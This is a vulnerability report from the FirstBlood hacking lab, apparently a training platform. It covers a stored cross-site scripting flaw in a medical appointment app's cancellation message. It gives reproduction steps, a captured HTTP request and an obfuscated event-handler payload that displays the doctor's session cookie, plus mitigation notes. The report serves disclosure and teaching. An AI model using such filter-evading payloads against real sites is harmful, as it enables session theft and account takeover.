FirstBlood-#848 — Stored XSS in cancelled appointment message
This issue was discovered on FirstBlood v2
On 2021-10-29, vigilante Level 4 reported:
Summary:
Note: This is a report I have submitted in V1 of First Blood, I am using another payload that is still vulnerable.
It is possible to trigger a stored XSS in the Doctor's "Cancelled Appointments" tab.
Description:
Stored XSS arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. In our case we can cancel an appointment with a message payload that triggers XSS when a Doctor opens up the "Cancelled Appointments" tab and hover's over our cancelled appointment.
Steps to Reproduce:
- Make a new an appointment here /book-appointment.php and note the Appointment ID.
- Go to "Manage appointment" and use the Appointment ID from Step 1. Retrieve the appointment.
- Send a request to cancel the appointment and capture it with Burp.
- Modify the request, add a message and use this payload
&message=blah"%20onpointereNTER="eval.call${'confirm\x28document.cookie\x29'}
"%20new="1
POST /api/ma.php?success&aptid=25db63a8-0561-4f6c-bd44-e4d217d94ad6 HTTP/1.1
Host: f6cca1fc0660-vigilante.a.firstbloodhackers.com
Cookie: drps=5825d2c88a1a5de2a23a7b6c8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Site-Req: permitted
Csrf: 99215d4e-0ff3-4275
Content-Length: 140
Origin: https://f6cca1fc0660-vigilante.a.firstbloodhackers.com
Referer: https://f6cca1fc0660-vigilante.a.firstbloodhackers.com/manageappointment.php?success&aptid=25db63a8-0561-4f6c-bd44-e4d217d94ad6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
message=blah"%20onpointereNTER="eval.call`${'confirm\x28document.cookie\x29'}`"%20new="1
&id=25db63a8-0561-4f6c-bd44-e4d217d94ad6&act=cancel
- Log is as DrAdmin and go to the "Cancelled Appointments" tab /drpanel/cancelled.php.
Here's how our message with the XSS payload will be rendered.
- Hover over our appointed, an XSS message with the dprs cookie will pop up.
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Mitigation
Use input filtering to prevent storing the XSS payload. Encode the output to prevent it from being interpreted as active content when displayed on the website.
P2 High
Endpoint: /api/ma.php
Parameter: message=
Payload: blah"%20onpointereNTER="eval.call`${'confirm\x28document.cookie\x29'}`"%20new="1
FirstBlood ID: 22
Vulnerability Type: Stored XSS
Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.